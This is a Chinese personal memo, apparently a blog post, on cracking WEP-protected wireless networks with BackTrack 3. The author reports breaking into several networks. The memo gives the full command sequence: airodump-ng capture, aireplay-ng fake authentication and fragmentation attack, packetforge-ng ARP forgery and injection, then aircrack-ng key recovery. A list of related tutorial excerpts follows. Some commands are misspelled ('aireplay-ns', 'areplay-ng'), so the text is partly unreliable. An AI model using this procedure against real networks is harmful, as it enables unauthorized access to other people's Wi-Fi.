今天根据google来的一些资料,成功破解了几个WEP无线网络,由于google来的资料比较杂乱,以下为我破解过程中手写的过程,在此以做备忘。
对于有无Client连接的AP,都使用此过程可破解WEP。
使用BT3从U盘启动,BT3下载地址如下:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb
下载此文件后,将其中文件放到U盘,并确保boot和BT3目录放在U盘根目录,执行boot目录下的bootinst.sh,一路回车后BT3启动盘制作完成。
1、用BT3启动,使用KDE。
2、modprobe -r iwl3945
3、modprobe ipwraw
注:以上两步为是为我的intel 3945ABG网卡加载驱动模块
4、先使用Airoscript查看可用的无线网络
不能在命令行下输入,要在菜单中找到Airosocript(在哪忘了,在B开头的菜单,找一会能找到)
5、打开新窗口,输入以下:
airodump-ng --ivs -w outputs -c 6 wifi0
注:outputs是保存的监控的数据文件名, 6是目标AP的Channel, wifi0是你的网卡设备号
6、打开新窗口,输入以下
aireplay-ng -1 0 -e ESSID -a APMAC -h LOCALMAC wifi0
以上ESSID是目标网络的ESSID, APMAC是目标AP的MAC LOCALMAC是本地网卡的MAC,这些都可以从第4步中找
到,或者使用ifconfig、iwconfig、iwlist来查找
7、生成XOR文件用于向目标AP发送攻击包
aireplay-ns -5 -b APMAC -h LOCALMAC wifi0
出现Read packages字样后等待,有时读几百个包就结束,有时读几十万个也不结束,貌似要看人品。。。
结束后出现 Use this packet ?后,输入y,在当前目录生成了.xor扩展保的文件。
8、准备发送攻击包
packetforge-ng -o -a APMAC -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp
注:上面的-l是L的小写,.xor就是第6步生成的文件。
9、发送攻击包
areplay-ng -2 -r mrarp -x 1024 wifi0
1024是发包间隔,以避免攻击包速度太快将对方AP搞跨。
执行此步后,会发现第4步输入后的窗口中,目标AP的记录中的DATA疯狂的增长,说明攻击成功。
10、当DATA增长至3万左右时,开新窗口,输入以下:
aircrack-ng -n 64 -b APMAC outputs-0.ivs
注:64指的是64位加密,如果是128的则换成128,.ivs是第4步命令时生成的数据文件,一般文件名就是第4步起的名字后加数字后缀。
如果人品好,密码就会以16进制显示出来了!
分享到:
相关推荐
backtrack3(BT3)usb版破解WEP无线网络密码详细步骤.pdf
BT3破解无线wep加密操作步骤详解归类.pdf
BT3破解无线wep加密操作步骤详解借鉴.pdf
### BT3破解无线WEP/WPA教程详解 #### 前言 随着无线网络的普及,网络安全成为了一个不容忽视的问题。对于WEP(Wired Equivalent Privacy)与WPA(Wi-Fi Protected Access)这两种常见的无线加密协议,其安全性...
本文将详细阐述如何使用BT3(BackTrack 3)Linux发行版来破解采用WEP加密的无线网络。 首先,你需要准备一个支持Linux系统的USB设备或光驱,以及一个内置或外置的无线网卡,通常称为“卡皇蹭网卡”。确保卡皇蹭网卡...
本文将详细介绍如何使用BT3系统破解无线WEP加密的过程。BT3,全称为BackTrack 3,是一款基于Linux的开源安全操作系统,特别设计用于网络安全审计和无线网络渗透测试。在无线网络中,WEP( Wired Equivalent Privacy...
本文档由**中国无线论坛**的用户“中卫”整理编辑而成,旨在为读者提供一套完整的使用BT3(BackTrack 3)破解无线网络WEP及WPA加密协议的方法。作者特别强调,该教程仅供学习与交流之用,未经允许侵入他人网络属非法...
本文档详细介绍了一种利用Intel3945芯片组配合BackTrack 3(BT3)操作系统破解无线网络WEP/WPA加密的方法。请注意,本教程仅供学习和研究用途,请确保您拥有对目标网络的所有权或已获得合法授权。 #### 二、准备...
因此,了解如何通过笔记本电脑破解WEP加密的无线路由器不仅有助于提高个人的技术水平,更重要的是可以增强对于无线网络安全性的认识,并采取相应的防护措施。 #### 二、所需工具与环境配置 ##### 1. 软件准备 - **...
本文档旨在为初学者提供一套完整的使用BT3(BackTrack 3)进行无线路由器密码破解的过程,并附带具体实例,帮助读者快速掌握无线网络安全的基本操作和技术要点。 #### 二、基础知识 在深入探讨具体的CMD命令之前,...
本文档旨在指导初学者及无线安全爱好者如何在BT3(BackTrack 3)环境下使用卡王无线网卡进行WEP加密网络的自动破解。本教程假设读者对BT3有一定的了解,并具备基本的Linux命令操作能力。 #### 准备工作 1. **启动...
然而,对于网络安全爱好者来说,了解如何破解WEP仍然是一个重要的学习内容,这有助于更好地理解无线网络的安全机制,并提高自身的网络安全意识。 本教程将详细介绍如何使用BT3(BackTrack 3)进行WEP密码破解的过程...
通过上述步骤,我们可以使用虚拟机和BT4来进行WEP加密无线网络的安全测试。然而,在实际应用中需要注意以下几点: - **合法性**:确保所有的测试活动都是在授权范围内进行的。 - **安全性**:不要在未经授权的情况...
- 当Kismet(一个无线网络检测工具)启动后窗口立即消失,检查网卡驱动是否正确配置。在`/usr/local/etc/kismet.conf`文件中添加源驱动信息。 3. **BT3不识别网卡**: - 查看BT3支持的网卡列表,确保你的网卡型号...
- **标题与描述**: 标题和描述均指代同一份PDF电子书——《2200BG Linux 下BT3 破解64bit WEP.pdf》,主要介绍了如何在特定硬件环境下(2200BG无线网卡)以及特定操作系统环境下(Linux下的BackTrack 3发行版)进行...
标题和描述中提到的知识点是关于“一分钟制作BT3_U盘(无线路由加密破解)”,这一过程涉及到几个关键步骤和概念,以下是对这些知识点的详细说明: ### 一分钟制作BT3_U盘 #### 1. **下载BT3 U盘版镜像** - 首先,...
本文详尽地介绍了使用BT4系统进行无线网络WEP/WPA破解的过程。然而,重要的是要强调,所有这些技术应仅用于合法的网络测试和学习目的,绝不能用于非法入侵或破坏他人的网络安全。网络管理员应定期更新和加强其网络的...
4. **选择目标**:寻找加密方式为WEP的无线网络(标识为ENC: wep, CIPHER: wep)。注意信号强度和数据包数量,选择数据包变化较快的目标,因为破解需要大量数据包。 5. **开始破解**:再次打开命令行,运行 `...
通过上述步骤,你可以实现在BT3环境下破解WEP无线加密的目标。需要注意的是,这种操作仅适用于合法授权的网络环境,任何未经授权的入侵行为都是违法的。此外,在实际操作过程中可能会遇到各种问题,比如网络设备的...